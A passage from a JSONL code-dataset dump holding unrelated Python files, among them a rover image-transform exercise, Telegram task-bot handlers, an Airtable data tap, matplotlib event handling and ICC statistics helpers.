mode='r'):\n filepath = self.path()\n dirpath = filepath.up()\n if dirpath.exists() is False:\n dirpath.create()\n\n return open(filepath, mode)\n\nclass Manager(object):\n def __init__(self, location, extension=DEFAULT_EXT):\n self.location = location\n self.extension = extension\n\n def iterPresets(self, localeOrdering=LOCALES):\n presetsYielded = set()\n for locale in localeOrdering:\n baseLocation = locale.path / self.location\n if not baseLocation.exists():\n continue\n\n for f in baseLocation.files():\n if f.hasExtension(self.extension):\n if f.name() in presetsYielded:\n continue\n\n presetsYielded.add(f.name())\n yield Preset.FromFilepath(f)\n\n def getPreset(self, name, localeOrdering=LOCALES):\n for locale in localeOrdering:\n preset = Preset(name, self.location, locale, self.extension)\n if preset.path().exists():\n return preset\n\n # if no existing preset is found, return an instance in the default location (the first locale in the list)\n return Preset(name, self.location, localeOrdering[0], self.extension)\n\n#end\n","sub_path":"CONFIG_v2.5/mayaConfig/modules_local/UTSMOD/2016/mac/quarantined_scripts/zoo/presets.py","file_name":"presets.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"63245033","text":"#import packages from matplotlib\nimport matplotlib.image as mpimg\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\n\n# read image\nfilename='sample.jpg'\nimage=mpimg.imread(filename)\n\ndef color_thresh(img, rgbthresh=(0,0,0)):\n #create empty array\n color_select = np.zeros_like(img[:,:,0])\n # apply threshold for RGB and assign 1\n above_threshold = (img[:,:,0]>rgbthresh[0]) \\\n & (img[:,:,1]>rgbthresh[1]) \\\n & (img[:,:,2]>rgbthresh[2])\n color_select[above_threshold] = 1\n return color_select\n\ndef perspect_transform(img, src, dst):\n\t#get transformation matrix M\n\tM = cv2.getPerspectiveTransform(src,dst)\n\t#warp image\n\twarped = cv2.warpPerspective(img, M, (img.shape[1],img.shape[0]))\n\treturn warped\n\n# convert to rover coordinates function\ndef rover_coords(binary_img): \n\t# identify nonzero pixels\n\typos, xpos = binary_img.nonzero()\n\t# calculate pixel positions with ref to the rover position at the center, btm of img\n\tx_pixel = -(ypos - binary_img.shape[0]).astype(np.float)\n\ty_pixel = -(xpos - binary_img.shape[1]/2 ).astype(np.float)\n\treturn x_pixel, y_pixel\n\n# set destination size, source points, destination points \ndst_size = 5.0 \nbtm_offset = 6 # so that image will start 6 rows front of rover\n\nsource = np.float32([[14,140],[301,140],[200,96],[118,96]])\ndestination = np.float32([[image.shape[1]/2 - dst_size, image.shape[0] - btm_offset],\n\t\t\t\t\t\t [image.shape[1]/2 + dst_size, image.shape[0] - btm_offset],\n\t\t\t\t\t\t [image.shape[1]/2 + dst_size, image.shape[0] - 2*dst_size - btm_offset],\n\t\t\t\t\t\t [image.shape[1]/2 - dst_size, image.shape[0] - 2*dst_size - btm_offset]]) \n\n\n# Perform perspective transform and color threshold\nwarped = perspect_transform(image, source, destination)\ncolor_sel = color_thresh(warped, rgbthresh=(160,160,160))\nxpix, ypix = rover_coords(color_sel)\n\n# plot map in rover coordinates\nfig = plt.figure(figsize=(5, 7.5))\nplt.plot(xpix, ypix, '.')\nplt.ylim(-160, 160)\nplt.xlim(0, 160)\nplt.title('Rover-Centric Map', fontsize=20)\nplt.show()","sub_path":"exercises/rover_coords.py","file_name":"rover_coords.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"473146636","text":"import numpy as np \nimport sys\nimport os\nfrom numpy import linalg as LA\n\nfiles = os.listdir('advs')\nmetric = sys.argv[-1]\nsign = sys.argv[-2]\nattack = sys.argv[-3]\nlst = []\nfor f in files:\n if f.find('mnist') == -1:\n continue\n if not f.endswith('show.npy'):\n continue\n if f.find(attack) == -1:\n continue\n if f.find(sign) == -1:# and f.find('high') == -1:# and f.find('mix') == -1:\n continue\n if f.find(metric) == -1:\n continue\n lst.append(f)\nlist.sort(lst)\n#lst = lst[-4:]\nprint(lst)\nidxs = np.load('data/final_random_1000_correct_idxs.npy')+60000\nimgs = np.load('data/mnist_data.npy')[idxs].astype(np.float32) / 255.\nlabs = np.load('data/mnist_labels.npy')[idxs]\nprint(imgs.shape, labs.shape)\n#print(imgs[999]==0)\ncnt = 0\nnum = 1000\nfor f in lst:\n cnt = 0\n print(f)\n f = os.path.join('advs', f)\n b = np.load(f).astype(np.float32) / 255.\n a = np.load(f[:-8]+'label.npy')\n if len(a) == num:\n np.save(f[:-8]+'idxs.npy', np.arange(cnt, cnt+num))\n cnt += num\n continue\n\n pos, tmp = [], []\n mindis, i = np.inf, 0\n for j in range(cnt, cnt+num):\n v = labs[j]\n if i >= len(a):\n break\n# print(i, v, a[i])\n if v == a[i]:\n if len(tmp) > 0:\n pos.append(np.random.permutation(tmp)[0])\n tmp = []\n# print(v, j)\n# mindis = LA.norm((b[i]-imgs[j]).reshape(-1), np.inf) if metric == 'linf' else LA.norm((b[i]-imgs[j]).reshape(-1), 2)\n mindis = np.max(np.absolute(b[i]-imgs[j])) if metric == 'linf' else np.sum((b[i]-imgs[j])**2)\n tmp = [j]\n# print(v, a[i-1], pos, mindis, tmp)\n i += 1\n elif i > 0 and v == a[i-1]:\n dis = np.max(np.absolute(b[i]-imgs[j])) if metric == 'linf' else np.sum((b[i]-imgs[j])**2)\n if dis < mindis:\n mindis = dis\n tmp = [j]\n elif dis == mindis:\n tmp.append(j)\n# print(i, v, a[i-1], dis, mindis)\n \n if len(tmp) > 0:\n pos.append(np.random.permutation(tmp)[0])\n print(len(a), len(pos))\n assert len(a) == len(pos) #print(len(a), len(pos))\n np.save(f[:-8]+'idxs.npy', pos)\n cnt += num\n \n","sub_path":"label_to_idxs.py","file_name":"label_to_idxs.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"575792923","text":"import sqlalchemy\nimport logging\n\nfrom db import User, Task, Session\nfrom handlers_index import *\nfrom markup import confirm_markup, markup, delete_markup\n\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\n\n\ndef start(update, context):\n username = update.message[\"chat\"][\"username\"]\n user = User(username=username)\n\n session = Session()\n\n try:\n session.add(user)\n session.commit()\n except sqlalchemy.exc.IntegrityError:\n print(\"User has already been created\")\n\n update.message.reply_text(\n \"Hi! I'm the best task manager in Telegram\\n\"\n \"Why don't add your tasks here?\",\n reply_markup=markup,\n parse_method=\"html\"\n )\n\n return CHOOSING\n\n\ndef add(update, context):\n\n update.message.reply_text(\"Enter your task\", reply_markup=delete_markup)\n return ADD\n\n\ndef add_task(update, context):\n text = update.message.text\n context.user_data[\"task\"] = text\n\n context.bot.send_message(text=\"Save?\\n\"\n \"{}\".format(text),\n chat_id=update.effective_chat.id,\n reply_markup=confirm_markup)\n return ADD_CONFIRM\n\n\ndef add_confirm(update, context):\n answer = update.message.text\n\n if answer == \"Yes\":\n username = update.message[\"chat\"][\"username\"]\n text = context.user_data[\"task\"]\n\n session = Session()\n user = session.query(User).filter(User.username == username).one()\n\n user.tasks.append(Task(text=text))\n session.commit()\n\n update.message.reply_text(\"A new task has been successfully created!\", reply_markup=markup)\n else:\n del context.user_data[\"task\"]\n\n return CHOOSING\n\n\ndef delete(update, context):\n update.message.reply_text(\n \"Enter the id of the task to delete\"\n )\n\n return DELETE\n\n\ndef delete_id(update, context):\n text = update.message.text\n username = update.message.chat.username\n\n context.user_data[\"id\"] = text\n\n session = Session()\n u = session.query(User).filter(User.username == username).one()\n\n ts = u.tasks\n\n update.message.reply_text(\n \"Are tou sure that you want to delete a task:\\n\"\n \"{}\".format(ts[int(text)-1]),\n parse_method=\"html\",\n reply_markup=confirm_markup\n )\n return DELETE_CONFIRM\n\n\ndef delete_confirm(update, context):\n text = update.message.text\n username = update.message.chat.username\n\n if text == \"Yes\":\n session = Session()\n u = session.query(User).filter(User.username == username).one()\n\n ts = u.tasks\n id = int(context.user_data[\"id\"]) - 1\n\n task = ts[id]\n\n session.delete(task)\n session.commit()\n\n del context.user_data[\"id\"]\n\n update.message.reply_text(\"You have successfully deleted the task!\", reply_markup=markup)\n return CHOOSING\n elif text == \"No\":\n update.message.reply_text(\"It's ok\", reply_markup=markup)\n\n return CHOOSING\n else:\n update.message.reply_text(\"Type 'Yes' or 'No'\")\n\n return DELETE_CONFIRM\n\n\ndef show(update, context):\n username = update.message[\"chat\"][\"username\"]\n print(username)\n update.message.reply_text(\n \"Your tasks:\"\n \"{}\".format(tasks(username))\n )\n\n return CHOOSING\n\n\ndef tasks(username):\n session = Session()\n r = list()\n\n u = session.query(User).filter(User.username == username).one()\n\n for i, t in enumerate(u.tasks):\n r.append(\"{0}. {1}\".format(i+1, t.text))\n\n return \"\\n\".join(r).join(['\\n', '\\n'])\n\n\ndef finish(update, context):\n update.message.reply_text(\"Bye-bye\")\n\n\ndef error(update, context):\n \"\"\"Log Errors caused by Updates.\"\"\"\n logger.warning('Update \"%s\" caused error \"%s\"', update, context.error)\n","sub_path":"handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":3871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"367448238","text":"\"\"\"Constants for the Dynalite component.\"\"\"\nimport logging\n\nLOGGER = logging.getLogger(__package__)\nDOMAIN = \"dynalite\"\n\nENTITY_PLATFORMS = [\"light\"]\n\nCONF_ACTIVE = \"active\"\nCONF_ALL = \"ALL\"\nCONF_AREA = \"area\"\nCONF_AUTO_DISCOVER = \"autodiscover\"\nCONF_BRIDGES = \"bridges\"\nCONF_CHANNEL = \"channel\"\nCONF_DEFAULT = \"default\"\nCONF_FADE = \"fade\"\nCONF_HOST = \"host\"\nCONF_NAME = \"name\"\nCONF_POLLTIMER = \"polltimer\"\nCONF_PORT = \"port\"\n\n\nDEFAULT_NAME = \"dynalite\"\nDEFAULT_PORT = 12345\n","sub_path":"homeassistant/components/dynalite/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"9596184","text":"\"\"\"\nExtension functions to discard all moderated messages in a SourceForge-based\nmailman queue.\n\n(Currently there is no way to do this without manually selecting 'discard'\nfor each and every message.)\n\"\"\"\n\nimport re\n\nfrom twill import browser, log, utils\n\n__all__ = ['discard_all_messages', 'exit_if_empty']\n\n\ndef exit_if_empty():\n \"\"\">> exit_if_empty\n\n Exit the script currently running, if there are no deferred messages\n on the current page.\n \"\"\"\n form = browser.form()\n if not form:\n log.error(\"No messages; exiting.\")\n raise SystemExit\n\n\ndef discard_all_messages():\n \"\"\">> discard_all_messages\n\n Set all buttons to \"discard\".\n \"\"\"\n _formvalue_by_regex_setall('1', '^\\\\d+$', '3')\n\n\ndef _formvalue_by_regex_setall(form_name, field_name, value):\n form = browser.form(form_name)\n if not form:\n log.error(\"no such form '%s'\", form_name)\n return\n\n regex = re.compile(field_name)\n\n matches = [ctl for ctl in form.controls if regex.search(str(ctl.name))]\n\n if matches:\n log.info('-- matches %d', len(matches))\n\n n = 0\n for control in matches:\n browser.clicked(form, control)\n if not control.readonly:\n utils.set_form_control_value(control, value)\n n += 1\n\n log.info('set %d values total', n)\n","sub_path":"twill/extensions/mailman_sf.py","file_name":"mailman_sf.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"267797980","text":"from docx import Document\nfrom docx.shared import Inches\nfrom slugify import slugify\nimport os\n\nfit_control_widget = cs.current_fit_widget\nfs = fit_control_widget.fit\nfww = cs.mdiarea.currentSubWindow()\n\ndocument = Document()\ndocument.add_heading(cs.current_fit.name, 0)\n\npk = cs.current_fit.model.parameters_all_dict.keys()\npk.sort()\n\ntarget_path = mfm.working_path\n\ndocument.add_heading('Fit-Results', level=1)\nfor i, f in enumerate(fs):\n\n fit_control_widget.selected_fit = i\n filename = slugify(unicode(os.path.basename(f.data.name)[0]))\n document.add_paragraph(\n filename, style='ListNumber'\n )\n\n target_dir = os.path.join(target_path, str(i), filename)\n try:\n os.makedirs(target_dir)\n except WindowsError:\n pass\n\n px = QtGui.QPixmap.grabWidget(fww)\n fit_png = os.path.join(target_dir, 'screenshot_fit.png')\n px.save(fit_png)\n\n px = QtGui.QPixmap.grabWidget(cs.current_fit.model)\n model_png = os.path.join(target_dir, 'screenshot_model.png')\n px.save(model_png)\n document.add_picture(model_png, width=Inches(2.5))\n document.add_picture(fit_png, width=Inches(2.5))\n try:\n tr = cs.current_fit.name.replace(':','_')\n cs.current_fit.save(target_dir, tr)\n except IOError:\n cs.current_fit.save(target_dir, 'fit')\n\ndocument.add_heading('Summary', level=1)\np = document.add_paragraph('Parameters which are fitted are given in ')\np.add_run('bold').bold = True\np.add_run(', linked parameters in ')\np.add_run('italic.').italic = True\np.add_run(' fixed parameters are plain text. ')\n\ntable = document.add_table(rows=1, cols=len(fs)+1)\nhdr_cells = table.rows[0].cells\nhdr_cells[0].text = \"Fit-Nbr\"\nfor i, f in enumerate(fs):\n hdr_cells[i+1].text = str(i + 1)\n\nfor k in pk:\n row_cells = table.add_row().cells\n row_cells[0].text = str(k)\n for i, f in enumerate(fs):\n paragraph = row_cells[i + 1].paragraphs[0]\n run = paragraph.add_run('{:.3f}'.format(f.model.parameters_all_dict[k].value))\n if f.model.parameters_all_dict[k].fixed:\n continue\n else:\n if f.model.parameters_all_dict[k].link is not None:\n run.italic = True\n else:\n run.bold = True\n\nrow_cells = table.add_row().cells\nrow_cells[0].text = str(\"Chi2r\")\nfor i, f in enumerate(fs):\n paragraph = row_cells[i + 1].paragraphs[0]\n run = paragraph.add_run('{:.4f}'.format(f.chi2r))\ntry:\n tr = slugify(unicode(fs.name))\n document.save(os.path.join(target_path, tr+'.docx'))\nexcept IOError:\n document.save(os.path.join(target_path, 'fit.docx'))\n cs.current_fit.save(target_dir, 'fit')\n","sub_path":"chisurf/macro/save_fit.py","file_name":"save_fit.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"38888123","text":"'''\r\nCreated on Jun 11, 2018\r\n\r\n@author: xh\r\n'''\r\n\r\n\r\nfrom param import Parameter\r\nfrom evaluation import evaluate_seg\r\nfrom morphanalyzer import MorphAnalyzer\r\n\r\n\r\ndef read_word_freq_list(infile):\r\n \"\"\"Read a file where each line contains a word and its frequency count, tab-separated.\r\n\r\n Returns a list of tuples of the form (word, freq).\r\n \"\"\"\r\n fin = open(infile, 'r', -1, 'utf-8')\r\n wordlist = []\r\n for line in fin:\r\n splitline = line.strip().split()\r\n if not line:\r\n continue\r\n word = splitline[0]\r\n freq = int(splitline[1])\r\n wordlist.append((word, freq))\r\n fin.close()\r\n return wordlist\r\n\r\n\r\ndef read_test_gold(infile):\r\n \"\"\"Read the gold-standard morphological segmentation from a file.\r\n\r\n Each line contains a word, followed by a colon, and then a space-separated list of allowable morphological segments\r\n where the segments are separated by dashes.\r\n\r\n Returns a list of words, and a list of lists of segmentations. Should be of the same length.\r\n \"\"\"\r\n fin = open(infile, 'r', -1, 'utf-8')\r\n wordlist = []\r\n goldseglist = []\r\n for line in fin:\r\n line = line.strip()\r\n token_segs = line.split(':')\r\n # get the full list of segmentations\r\n seg_candidates = token_segs[1].strip().split(' ')\r\n original_word = token_segs[0].strip()\r\n word = ''\r\n segs_morphs = []\r\n for seg in seg_candidates:\r\n # break each segmentation into segments\r\n seg_morphs = seg.strip().split('-')\r\n mainword = ''.join(seg_morphs)\r\n if word != '' and mainword != word: # ensure the segmentations are spelled the same as the word itself\r\n print('Inconsistent segmentations: %s - %s' % (word, mainword))\r\n word = mainword\r\n # save the segmentation as a tuple of segments\r\n segs_morphs.append(tuple(seg_morphs))\r\n wordlist.append(original_word)\r\n goldseglist.append(segs_morphs)\r\n fin.close()\r\n return wordlist, goldseglist\r\n\r\n\r\ndef add_test_to_train(train_word_freq_list, test_list):\r\n \"\"\"Add words from the test data to the frequency list, assuming a frequency of 10.\"\"\"\r\n # turn it into a dictionary\r\n word_dict = dict(train_word_freq_list)\r\n for word in test_list:\r\n if word in word_dict:\r\n word_dict[word] += 10\r\n else:\r\n word_dict[word] = 10\r\n # change back to a list of tuples and return\r\n return sorted(word_dict.items(), key=lambda x: -x[1])\r\n\r\n\r\ndef run_experiment(infile_train, infile_test_gold, params):\r\n \"\"\"Run an experiment by reading data from a training file and testing on the gold standard data.\"\"\"\r\n print('| Reading data...')\r\n # read the frequency list data\r\n train_word_freq_list = read_word_freq_list(infile_train)\r\n # read the gold standard data into a test list of words and the answers\r\n test_list, test_gold = read_test_gold(infile_test_gold)\r\n # print the length of the training and test data\r\n print('--Training data: %s' % (len(train_word_freq_list)))\r\n print('--Testing data: %s' % (len(test_list)))\r\n\r\n # add the test data to the training data. This is to ensure all words in the test data are listed with freq > 0.\r\n train_word_freq_list = add_test_to_train(train_word_freq_list, test_list)\r\n\r\n print('| Training...')\r\n # create the analyzer using the specified parameters\r\n morph_analyzer = MorphAnalyzer(params)\r\n # train\r\n morph_analyzer.train(train_word_freq_list)\r\n\r\n print('| Segmenting test tokens...')\r\n # segment the test data\r\n test_segs_components = morph_analyzer.segment_token_list(test_list)\r\n # get the segmentation listed for each word\r\n test_segs = [x[0] for x in test_segs_components]\r\n print('| Evaluation...')\r\n # get precision, recall, and F1 scores\r\n evaluate_seg(test_gold, test_segs)\r\n\r\n\r\ndef run_english():\r\n \"\"\"Runs an experiment on English data against gold standard results.\"\"\"\r\n params = Parameter()\r\n params.UseTransRules = True\r\n params.DoPruning = True\r\n params.DoCompound = True\r\n params.ExcludeUnreliable = True\r\n params.BestNCandSuffix = 70\r\n infile_train = r'data/wordlist.2010.eng.utf8.txt'\r\n infile_test_gold = r'data/mit/gold.eng.txt'\r\n run_experiment(infile_train, infile_test_gold, params)\r\n\r\n\r\ndef run_turkish():\r\n \"\"\"Runs an experiment on Turkish data against gold standard results.\"\"\"\r\n params = Parameter()\r\n params.UseTransRules = True\r\n params.DoPruning = False\r\n params.DoCompound = False\r\n params.ExcludeUnreliable = False\r\n params.BestNCandSuffix = 150\r\n infile_train = r'data/wordlist.2010.tur.utf8.txt'\r\n infile_test_gold = r'data/mit/gold.tur.txt'\r\n run_experiment(infile_train, infile_test_gold, params)\r\n\r\n\r\ndef run_finnish():\r\n \"\"\"Runs an experiment on Finnish data against gold standard results.\"\"\"\r\n params = Parameter()\r\n params.UseTransRules = False\r\n params.DoPruning = True\r\n params.DoCompound = True\r\n params.ExcludeUnreliable = True\r\n params.BestNCandSuffix = 150\r\n infile_train = r'data/wordlist.2010.fin.utf8.txt'\r\n infile_test_gold = r'data/mit/gold.fin.txt'\r\n run_experiment(infile_train, infile_test_gold, params)\r\n\r\n\r\nif __name__ == '__main__':\r\n run_english()\r\n #run_turkish()\r\n #run_finnish()\r\n","sub_path":"coling2018.py","file_name":"coling2018.py","file_ext":"py","file_size_in_byte":5373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"292184518","text":"import sys\nimport unittest\nfrom io import BytesIO, TextIOWrapper\n\nfrom pov_server_page.du_diff import parse_du, main\n\n\nclass TestParseDu(unittest.TestCase):\n\n def test_parse_du(self):\n self.assertEqual(parse_du(BytesIO(b'4\\tfoo\\n50\\tbar\\n\\n')), {\n b'foo': 4,\n b'bar': 50,\n })\n\n\nclass TestMain(unittest.TestCase):\n\n def run_main(self, *args):\n orig_sys_argv = sys.argv\n orig_sys_stdout = sys.stdout\n try:\n sys.argv = ['du-diff'] + list(args)\n sys.stdout = self.stdout = TextIOWrapper(BytesIO())\n main()\n finally:\n sys.stdout = orig_sys_stdout\n sys.argv = orig_sys_argv\n\n def test_main(self):\n self.run_main('/dev/null', '/dev/null')\n","sub_path":"tests/test_du_diff.py","file_name":"test_du_diff.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"120046930","text":"from services.fields_mapping import FieldsMapping\nfrom utils.json_utils import JsonUtils, Relations\nimport requests\nimport json\nimport singer\n\n\nclass Airtable(object):\n with open('./config.json', 'r') as f:\n config = json.load(f)\n metadata_url = config[\"metadata_url\"]\n records_url = config[\"records_url\"]\n token = config[\"token\"]\n\n @classmethod\n def run_discovery(cls, base_id):\n headers = {'Authorization': 'Bearer {}'.format(cls.token)}\n response = requests.get(url=cls.metadata_url + base_id, headers=headers)\n schemas = []\n\n for table in response.json()[\"tables\"]:\n\n columns = {}\n schema = {\"name\": table[\"name\"],\n \"properties\": columns}\n\n columns[\"id\"] = {\"type\": [\"null\", \"string\"], 'key': True}\n\n for field in table[\"fields\"]:\n if not field[\"name\"] == \"Id\":\n columns[field[\"name\"]] = {\"type\": [\"null\", FieldsMapping.map_field(field[\"config\"])]}\n\n schemas.append(schema)\n\n with open('./services/{}_schemas.json'.format(base_id), 'w') as outfile:\n json.dump(schemas, outfile)\n\n @classmethod\n def run_tap(cls, base_id):\n\n with open('./services/{}_schemas.json'.format(base_id), 'r') as f:\n schemas = json.load(f)\n\n for schema in schemas:\n table = schema[\"name\"].replace('/', '')\n table = table.replace(' ', '')\n\n if table != 'relations':\n response = Airtable.get_response(base_id, schema[\"name\"])\n if response.json().get('records'):\n records = JsonUtils.match_record_with_keys(schema,\n response.json().get('records'))\n\n singer.write_schema(table, schema, 'id')\n singer.write_records(table, records)\n\n offset = response.json().get(\"offset\")\n\n while offset:\n response = Airtable.get_response(base_id, schema[\"name\"], offset)\n if response.json().get('records'):\n records = JsonUtils.match_record_with_keys(schema,\n response.json().get('records'))\n\n singer.write_records(table, records)\n offset = response.json().get(\"offset\")\n\n relations_table = {\"name\": \"relations\",\n \"properties\": {\"id\": {\"type\": [\"null\", \"string\"]},\n \"relation1\": {\"type\": [\"null\", \"string\"]},\n \"relation2\": {\"type\": [\"null\", \"string\"]}}}\n\n singer.write_schema('relations', relations_table, 'id')\n singer.write_records('relations', Relations.get_records())\n\n @classmethod\n def get_response(cls, base_id, table, offset=None):\n\n headers = {'Authorization': 'Bearer {}'.format(cls.token)}\n table = table.replace('/', '%2F')\n\n if offset:\n request = cls.records_url + base_id + '/' + table + '?offset={}'.format(offset)\n else:\n request = cls.records_url + base_id + '/' + table\n\n return requests.get(url=request, headers=headers)\n","sub_path":"services/airtable_api.py","file_name":"airtable_api.py","file_ext":"py","file_size_in_byte":3282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"566811386","text":"\"\"\"\nShown when a user tries to access or edit something that doesn't belong to them\nor is private.\nIf the rest of the site is written correctly, this should only ever be seen if\nsomeone manually types in a URL for an item or trade, because they should never\nbe given the option to view something that's private.\n\"\"\"\n\ndef private():\n\t# See what type of item the user was trying to look at.\n item_type = request.args[0]\n\n # See if the user was trying to edit something they don't own.\n edit = request.vars.get('edit') is not None\n\n # Set an appropriate title for the page.\n if edit:\n response.title = \"That's not yours\"\n else:\n response.title = \"Private\"\n\n # Give the user the option to go somewhere else instead.\n page_actions = [\n ('Previous Page', 'javascript:history.back()', 'arrow-left'),\n ('Home', URL('default', 'index'), 'home'),\n ('Search', URL('search', 'index'), 'search')\n ]\n\n return dict(item_type=item_type, page_actions=page_actions, edit=edit)\n\n\ndef not_found():\n # See what type of item the user was trying to look at.\n item_type = request.args[0]\n\n # Set an appropriate title for the page.\n response.title = \"Not Found\"\n\n # Give the user the option to go somewhere else instead.\n page_actions = [\n ('Previous Page', 'javascript:history.back()', 'arrow-left'),\n ('Home', URL('default', 'index'), 'home'),\n ('Search', URL('search', 'index'), 'search')\n ]\n\n return dict(item_type=item_type, page_actions=page_actions)\n","sub_path":"controllers/error.py","file_name":"error.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"221195223","text":"#! /usr/bin/python\n\nvocabulary={\n \"C\":\"a compile program language, linux was writed with it\",\n \"Python\":\"a script language, Ops used it\",\n \"javascript\":\"a script language, program dynamic web page\"\n}\n\nfor key,value in vocabulary.items():\n print(key+\":\"+value+\"\\n\")\n\n \n","sub_path":"Chapter06/ex06_03.py","file_name":"ex06_03.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"276121005","text":"r\"\"\"Connecting a mouse event to a callback function\n\"\"\"\n\nfrom __future__ import print_function, absolute_import\n\n# This may be required if you are on a Mac and default to using OSX as\n# your backend\n# import matplotlib\n# matplotlib.use('qt5agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nlast_ev = None\n\n\ndef event_printer(event):\n \"\"\"Helper function for exploring events.\n \"\"\"\n global last_ev\n last_ev = event\n print('{}'.format(event.name))\n print(vars(event))\n if event.name == 'button_release_event':\n print('=' * 25)\n else:\n print('-' * 25)\n\n\nth = np.linspace(0, 2*np.pi, 64)\nfig, ax = plt.subplots()\nax.plot(th, np.sin(th), 'o-', picker=5)\n\ncids = {k: fig.canvas.mpl_connect(k, event_printer)\n for k in ('button_press_event', 'button_release_event',\n 'scroll_event', 'key_press_event', 'key_release_event',\n 'pick_event')}\n\n\nplt.show()\n","sub_path":"key/00-explore.py","file_name":"00-explore.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"564714917","text":"import sys\n\nfrom PyQt4 import QtGui\nfrom PyQt4.QtGui import QMessageBox , QIcon\n\nclass FileHandler:\n def __init__(self , window):\n self.window = window\n self.filepath = None\n\n def saveAs(self):\n newPath = QtGui.QFileDialog.getSaveFileName(self.window , 'Chose save location' , '' , '*.dpemu')\n if newPath != \"\":\n self.filepath = newPath\n f = open(self.filepath , 'w')\n f.write(self.window.etTextEditor.toPlainText())\n f.close()\n\n #normal save if we have filepath otherwise go to saveas\n def save(self):\n if self.filepath == None:\n self.saveAs()\n else:\n f = open(self.filepath , 'w')\n f.write(self.window.etTextEditor.toPlainText())\n f.close()\n\n #open file\n def open(self):\n newPath = QtGui.QFileDialog.getOpenFileName(self.window , 'Chose file to open' , '' ,\n 'Dp Emulator file (*.dpemu)')\n if newPath != '':\n self.filepath = newPath\n f = open(self.filepath)\n self.window.etTextEditor.setPlainText(f.read())\n f.close()\n","sub_path":"dpSimFiles.py","file_name":"dpSimFiles.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"20836103","text":"#!/usr/bin/env python\n\"\"\"Genetic history reports.\n\nUsage:\n ./reporting.py --help\n ./reporting.py REPORT_TYPE GENERATIONS_FILE\n\nOptions:\n -h --help Show this help.\n REPORT_TYPE The report you want to print (possibles: values, ...)\n GENERATIONS_FILE The file containing the history of generations.\n\"\"\"\nfrom docopt import docopt\nfrom bokeh.plotting import figure, show, output_file\n\n\ndef read_generations(generations_file):\n with open(generations_file) as generations_data:\n return [eval(line)\n for line in generations_data.readlines()]\n\n\ndef values(generations):\n generation_indexes = range(len(generations))\n\n fig = figure()\n\n fig.xaxis.axis_label = 'generation'\n\n maxes = [max([value for game, value in generation])\n for generation in generations]\n mins = [min([value for game, value in generation])\n for generation in generations]\n averages = [sum([value for game, value in generation]) / len(generation)\n for generation in generations]\n\n value_groups = (\n ('max value', 'green', maxes),\n ('min value', 'red', mins),\n ('average value', 'blue', averages),\n )\n\n for name, color, values in value_groups:\n fig.line(generation_indexes, values, color=color, legend=name)\n\n output_file(\"values.html\")\n show(fig)\n\n\ndef run():\n \"\"\"Run a genetic algorithm of games.\"\"\"\n arguments = docopt(__doc__)\n\n report_type = arguments['REPORT_TYPE']\n generations_file = arguments['GENERATIONS_FILE']\n\n globals()[report_type](read_generations(generations_file))\n\nif __name__ == '__main__':\n run()\n\n\n","sub_path":"ai/reporting.py","file_name":"reporting.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"234648175","text":"import pandas as pd\nimport os\nimport shutil\nimport numpy as np\n\n# data_try = np.array([[7,8,3,5],\n# [2,4,4,1],\n# [1,2,6,1],\n# [5,5,7,2],\n# [8,9,5,6],\n# [9,10,6,7]])\n\n# pick group1 data according to case names in the other group\ndef pick_group1_data(all_path, group2_path, group1_path):\n pick_list = os.listdir(group2_path)\n for name in pick_list:\n copy_from = os.path.join(all_path,name)\n copy_to = os.path.join(group1_path,name)\n shutil.copytree(copy_from,copy_to)\n\n\ndef compute_BMS(data):\n mean_all = np.mean(data)\n mean_subject = np.mean(data, axis=1)\n n_rater = np.shape(data)[1]\n df = np.shape(data)[0]-1\n SS_between_people = n_rater * sum(np.square(mean_subject-mean_all))\n BMS = SS_between_people/df\n return BMS\n\n\ndef compute_RMS(data):\n mean_all = np.mean(data)\n mean_subject = np.mean(data, axis=0)\n n_rater = np.shape(data)[0]\n df = np.shape(data)[1]-1\n SS_between_items = n_rater * sum(np.square(mean_subject - mean_all))\n RMS = SS_between_items/ df\n return RMS\n\n\ndef compute_EMS(data):\n df_BMS = df = np.shape(data)[0]-1\n df_RMS = df = np.shape(data)[1]-1\n df_EMS = (data.shape[0]-1) * (data.shape[1]-1)\n SS_residual = data.size * np.var(data) - compute_BMS(data)*df_BMS - compute_RMS(data)*df_RMS\n EMS = SS_residual/df_EMS\n return EMS\n\n\ndef compute_ICC2(data):\n BMS = compute_BMS(data)\n RMS = 